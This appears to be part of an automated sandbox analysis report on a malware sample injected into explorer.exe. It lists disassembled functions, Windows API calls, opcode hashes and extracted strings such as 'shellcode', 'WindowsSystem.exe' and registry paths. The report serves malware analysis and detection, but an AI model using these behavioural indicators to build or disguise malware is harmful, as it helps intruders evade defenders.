                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 60cf21f62d1dc145206f08a91dd1bba283ab904a53c73a5ec01a131829a1e1fa
                                                                                                            • Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
                                                                                                            • Opcode Fuzzy Hash: 60cf21f62d1dc145206f08a91dd1bba283ab904a53c73a5ec01a131829a1e1fa
                                                                                                            • Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
                                                                                                            Function 00E24B0D Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: bc4a491e1d895ba903ebd733a6c2b6428fd16bf76896332000bf1874532a21ec
                                                                                                            • Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
                                                                                                            • Opcode Fuzzy Hash: bc4a491e1d895ba903ebd733a6c2b6428fd16bf76896332000bf1874532a21ec
                                                                                                            • Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
                                                                                                            Function 00E24C3E Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: fa60f3a416112e8adcec0e53fd871012574ce522b2df7edb6f362fde096d8998
                                                                                                            • Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
                                                                                                            • Opcode Fuzzy Hash: fa60f3a416112e8adcec0e53fd871012574ce522b2df7edb6f362fde096d8998
                                                                                                            • Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
                                                                                                            Function 00E24E5D Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: ad47ab168a522904eb856b3a1201d543518aba2d81f16c490d2d8a331398e2e9
                                                                                                            • Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
                                                                                                            • Opcode Fuzzy Hash: ad47ab168a522904eb856b3a1201d543518aba2d81f16c490d2d8a331398e2e9
                                                                                                            • Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00
                                                                                                            Function 00E24FEB Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 2bd924773c0a936edeb4f88b958d470719fc266598c3ddbb2f27d594b3bb43b2
                                                                                                            • Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
                                                                                                            • Opcode Fuzzy Hash: 2bd924773c0a936edeb4f88b958d470719fc266598c3ddbb2f27d594b3bb43b2
                                                                                                            • Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00
                                                                                                            Function 00E24F1C Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: ff5ee50a62be3026aaca02c36c402438e3cb08bf91299c3ab615d8e18b598aed
                                                                                                            • Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
                                                                                                            • Opcode Fuzzy Hash: ff5ee50a62be3026aaca02c36c402438e3cb08bf91299c3ab615d8e18b598aed
                                                                                                            • Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00

                                                                                                            Non-executed Functions

                                                                                                            Function 00E0A8C0 Relevance: 98.4, APIs: 42, Strings: 14, Instructions: 440stringregistrylibraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32 ref: 00E0AB8A
                                                                                                            • SetEvent.KERNEL32 ref: 00E0ABFF
                                                                                                              • Part of subcall function 00E17DA0: lstrlenW.KERNEL32 ref: 00E17DEC
                                                                                                            • wnsprintfW.SHLWAPI ref: 00E0AC32
                                                                                                            • RegDeleteKeyExW.ADVAPI32 ref: 00E0AC50
                                                                                                            • wnsprintfW.SHLWAPI ref: 00E0AC83
                                                                                                            • RegDeleteKeyExW.ADVAPI32 ref: 00E0ACA1
                                                                                                            • wnsprintfW.SHLWAPI ref: 00E0ACD4
                                                                                                            • RegDeleteKeyExW.ADVAPI32 ref: 00E0ACF2
                                                                                                            • wnsprintfW.SHLWAPI ref: 00E0AD25
                                                                                                            • RegDeleteKeyExW.ADVAPI32 ref: 00E0AD43
                                                                                                              • Part of subcall function 00E0F370: RegOpenKeyW.ADVAPI32 ref: 00E0F390
                                                                                                              • Part of subcall function 00E0F370: RegDeleteValueW.ADVAPI32 ref: 00E0F3A6
                                                                                                              • Part of subcall function 00E0F370: RegCloseKey.ADVAPI32 ref: 00E0F3B1
                                                                                                              • Part of subcall function 00E0F370: RegOpenKeyW.ADVAPI32 ref: 00E0F3D3
                                                                                                              • Part of subcall function 00E0F370: RegDeleteValueW.KERNEL32 ref: 00E0F3E9
                                                                                                              • Part of subcall function 00E0F370: RegCloseKey.ADVAPI32 ref: 00E0F3F4
                                                                                                              • Part of subcall function 00E105B0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00E04277), ref: 00E105CB
                                                                                                              • Part of subcall function 00E105B0: SHGetKnownFolderPath.SHELL32 ref: 00E105EF
                                                                                                              • Part of subcall function 00E105B0: DeleteFileW.KERNEL32 ref: 00E10625
                                                                                                              • Part of subcall function 00E105B0: CoTaskMemFree.COMBASE ref: 00E10630
                                                                                                              • Part of subcall function 00E105B0: LocalFree.KERNEL32 ref: 00E1063B
                                                                                                              • Part of subcall function 00E105B0: SHGetKnownFolderPath.SHELL32 ref: 00E10652
                                                                                                              • Part of subcall function 00E105B0: LocalAlloc.KERNEL32 ref: 00E1066A
                                                                                                              • Part of subcall function 00E105B0: LocalAlloc.KERNEL32 ref: 00E106B2
                                                                                                              • Part of subcall function 00E105B0: DeleteFileW.KERNEL32 ref: 00E106FD
                                                                                                              • Part of subcall function 00E105B0: RemoveDirectoryW.KERNEL32 ref: 00E10708
                                                                                                              • Part of subcall function 00E105B0: LocalFree.KERNEL32 ref: 00E10713
                                                                                                              • Part of subcall function 00E105B0: LocalFree.KERNEL32 ref: 00E1071E
                                                                                                              • Part of subcall function 00E105B0: CoTaskMemFree.COMBASE ref: 00E10729
                                                                                                              • Part of subcall function 00E0FD90: CoInitializeEx.COMBASE ref: 00E0FDC0
                                                                                                              • Part of subcall function 00E0FD90: CoUninitialize.COMBASE ref: 00E101C3
                                                                                                              • Part of subcall function 00E10330: OpenEventW.KERNEL32 ref: 00E10351
                                                                                                              • Part of subcall function 00E10330: SetEvent.KERNEL32 ref: 00E10372
                                                                                                              • Part of subcall function 00E10330: CloseHandle.KERNEL32 ref: 00E10380
                                                                                                              • Part of subcall function 00E10330: OpenMutexW.KERNEL32 ref: 00E103A0
                                                                                                              • Part of subcall function 00E10330: WaitForSingleObject.KERNEL32 ref: 00E103C6
                                                                                                              • Part of subcall function 00E10330: CloseHandle.KERNEL32 ref: 00E103D4
                                                                                                              • Part of subcall function 00E10330: SHGetKnownFolderPath.SHELL32 ref: 00E103EE
                                                                                                              • Part of subcall function 00E10330: LocalAlloc.KERNEL32 ref: 00E10406
                                                                                                              • Part of subcall function 00E10330: lstrlenW.KERNEL32 ref: 00E10467
                                                                                                              • Part of subcall function 00E10330: GetFileAttributesW.KERNEL32 ref: 00E104F3
                                                                                                              • Part of subcall function 00E10330: LocalFree.KERNEL32 ref: 00E10543
                                                                                                              • Part of subcall function 00E10330: CoTaskMemFree.COMBASE ref: 00E10551
                                                                                                              • Part of subcall function 00E10330: wnsprintfW.SHLWAPI ref: 00E1057E
                                                                                                              • Part of subcall function 00E10330: RegDeleteKeyExW.ADVAPI32 ref: 00E10596
                                                                                                              • Part of subcall function 00E101E0: SHGetKnownFolderPath.SHELL32 ref: 00E101F8
                                                                                                              • Part of subcall function 00E101E0: LocalAlloc.KERNEL32 ref: 00E10210
                                                                                                              • Part of subcall function 00E101E0: lstrlenW.KERNEL32 ref: 00E10262
                                                                                                              • Part of subcall function 00E101E0: GetFileAttributesW.KERNEL32 ref: 00E102CA
                                                                                                              • Part of subcall function 00E101E0: LocalFree.KERNEL32 ref: 00E1030B
                                                                                                              • Part of subcall function 00E101E0: CoTaskMemFree.COMBASE ref: 00E10316
                                                                                                              • Part of subcall function 00E0F790: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,00E167C4), ref: 00E0F7AF
                                                                                                              • Part of subcall function 00E0F790: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,00E167C4), ref: 00E0F7C3
                                                                                                              • Part of subcall function 00E0F790: wnsprintfW.SHLWAPI ref: 00E0F7FC
                                                                                                              • Part of subcall function 00E0F790: lstrlenW.KERNEL32 ref: 00E0F80B
                                                                                                              • Part of subcall function 00E0F790: CoTaskMemFree.COMBASE ref: 00E0F81D
                                                                                                            • GetFileAttributesW.KERNEL32 ref: 00E0AE29
                                                                                                            • SHFileOperationW.SHELL32 ref: 00E0AE48
                                                                                                            • LocalFree.KERNEL32 ref: 00E0AE79
                                                                                                            • GetWindowsDirectoryW.KERNEL32 ref: 00E0AF37
                                                                                                            • CreateProcessW.KERNEL32 ref: 00E0B00A
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00E0B019
                                                                                                            • DuplicateHandle.KERNEL32 ref: 00E0B06B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00E0B07A
                                                                                                            • DuplicateHandle.KERNEL32 ref: 00E0B0CB
                                                                                                            • LoadLibraryW.KERNEL32 ref: 00E0B0E2
                                                                                                            • GetProcAddress.KERNEL32 ref: 00E0B120
                                                                                                            • GetProcAddress.KERNEL32 ref: 00E0B13E
                                                                                                            • lstrcpyW.KERNEL32 ref: 00E0B15C
                                                                                                            • lstrcpyA.KERNEL32 ref: 00E0B172
                                                                                                            • lstrcpyA.KERNEL32 ref: 00E0B188
                                                                                                            • lstrcpyA.KERNEL32 ref: 00E0B19E
                                                                                                            • lstrcpyA.KERNEL32 ref: 00E0B1B4
                                                                                                            • lstrcpyA.KERNEL32 ref: 00E0B1CA
                                                                                                            • lstrcpyA.KERNEL32 ref: 00E0B1DD
                                                                                                            • lstrcpyW.KERNEL32 ref: 00E0B1F3
                                                                                                            • lstrcpyW.KERNEL32 ref: 00E0B209
                                                                                                            • LocalFree.KERNEL32 ref: 00E0B2D2
                                                                                                            • CloseHandle.KERNEL32 ref: 00E0B2F7
                                                                                                            • CloseHandle.KERNEL32 ref: 00E0B305
                                                                                                            • TerminateProcess.KERNEL32 ref: 00E0B31F
                                                                                                            • LocalFree.KERNEL32 ref: 00E0B32D
                                                                                                            • OpenEventW.KERNEL32 ref: 00E0B341
                                                                                                            • SetEvent.KERNEL32 ref: 00E0B362
                                                                                                            • CloseHandle.KERNEL32 ref: 00E0B370
                                                                                                            • shutdown.WS2_32 ref: 00E0B383
                                                                                                            • closesocket.WS2_32 ref: 00E0B391
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Deletelstrcpy$CloseHandle$AllocFilewnsprintf$EventFolderKnownOpenPathTask$Processlstrlen$Attributes$AddressCurrentDirectoryDuplicateProcValue$CreateInitializeLibraryLoadMutexObjectOperationRemoveSingleTerminateUninitializeWaitWindowsclosesocketsetsockoptshutdown
                                                                                                            • String ID: %s%s$2$SOFTWARE\%s$Software\%s$Software\%s$Software\%s$WindowsSystem$WindowsSystem.exe$h${108D3252-20F0-4C1B-940D-6ED5366D8FD3}${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${D961EA11-3F69-43D1-8581-E526BBBDC738}${DD700AA6-D197-4A4A-838A-B93EA96F236B}${DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
                                                                                                            • API String ID: 1118244034-4064362955
                                                                                                            • Opcode ID: 5d75a97702afd6feea535c42e6fa019a02aea97d84d842329c44f83779ea5af5
                                                                                                            • Instruction ID: fb91bb7698583037ed778a6a957c355f0cc8aa8b1cc083cf6f308e3d66f3868b
                                                                                                            • Opcode Fuzzy Hash: 5d75a97702afd6feea535c42e6fa019a02aea97d84d842329c44f83779ea5af5
                                                                                                            • Instruction Fuzzy Hash: FE42F436218BC095D770DB14F8983DAB3A5F798754F901626D68D93BA8EF7DC288CB40
                                                                                                            Function 00E0E8C0 Relevance: 93.0, APIs: 43, Strings: 10, Instructions: 213stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCommandLineW.KERNEL32 ref: 00E0E8C7
                                                                                                            • CommandLineToArgvW.SHELL32 ref: 00E0E8DC
                                                                                                            • lstrcmpiW.KERNEL32 ref: 00E0E8F7
                                                                                                            • lstrcmpiW.KERNEL32 ref: 00E0E91D
                                                                                                              • Part of subcall function 00E05AD0: GetModuleFileNameW.KERNEL32 ref: 00E05AFE
                                                                                                              • Part of subcall function 00E05AD0: _LDint.LIBCPMTD ref: 00E05B15
                                                                                                              • Part of subcall function 00E05AD0: CreateFileW.KERNEL32 ref: 00E05B93
                                                                                                              • Part of subcall function 00E05AD0: WriteFile.KERNEL32 ref: 00E05BF0
                                                                                                              • Part of subcall function 00E05AD0: CloseHandle.KERNEL32 ref: 00E05C13
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CommandLinelstrcmpi$ArgvCloseCreateDintHandleModuleNameWrite
                                                                                                            • String ID: shellcode${0F01F64A-5A5B-4CC4-B069-D85368F634DD}${34E50511-FBB8-42F8-98A2-2629192A03A0}${6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}${8399C93C-77D8-4A9E-96D7-0200E8B3EE42}${8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}${9D5F29AE-FCE3-40C6-8BE3-47B8C62D31E2}${A3956157-6EDC-4743-A7B9-FF7CDC2529A9}${D77DC119-1B4A-41E3-A066-2927413CA76D}${FF4E2D7F-189B-498D-BED3-F1AA783F6E3F}
                                                                                                            • API String ID: 3070626111-3874382022
                                                                                                            • Opcode ID: 7c865470e0464a453324e7636fbae510bfa24f6739339a5ff32697ba5d3373e2
                                                                                                            • Instruction ID: 314d48a27221324a8134bb630a9b6c45ecb2ebd68f23e116a1486b7a9c09201c
                                                                                                            • Opcode Fuzzy Hash: 7c865470e0464a453324e7636fbae510bfa24f6739339a5ff32697ba5d3373e2
                                                                                                            • Instruction Fuzzy Hash: D7B12031214AC082E754DB25F99835AB3A1F7D87D5F506926E68BA37B4DF7EC888C700
                                                                                                            Function 00E2F834 Relevance: 40.7, APIs: 22, Strings: 1, Instructions: 465COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                                                            • String ID: U
                                                                                                            • API String ID: 3902385426-4171548499
                                                                                                            • Opcode ID: a0fba5ec8bfd1601ee77868f40c78684f16d8da371eac1b93d88cd03410f8666
                                                                                                            • Instruction ID: 5d9714b793314be4d6857517d2f6393132a5fb2a092808b50d725af9a9fd38e9
                                                                                                            • Opcode Fuzzy Hash: a0fba5ec8bfd1601ee77868f40c78684f16d8da371eac1b93d88cd03410f8666
                                                                                                            • Instruction Fuzzy Hash: 24021233304AA586EB208F25F4943AAB771F785B98F552136EA8A67764DF3DC445CB00
                                                                                                            Function 00E2E88C Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159fileCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _set_error_mode.LIBCMT ref: 00E2E8D1
                                                                                                            • _set_error_mode.LIBCMT ref: 00E2E8E2
                                                                                                            • GetModuleFileNameW.KERNEL32 ref: 00E2E944
                                                                                                              • Part of subcall function 00E2A834: GetCurrentProcess.KERNEL32(?,?,?,?,00E2A8D6), ref: 00E2A84C
                                                                                                            • GetStdHandle.KERNEL32 ref: 00E2EA59
                                                                                                            • WriteFile.KERNEL32 ref: 00E2EAB6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                            • API String ID: 2183313154-4022980321
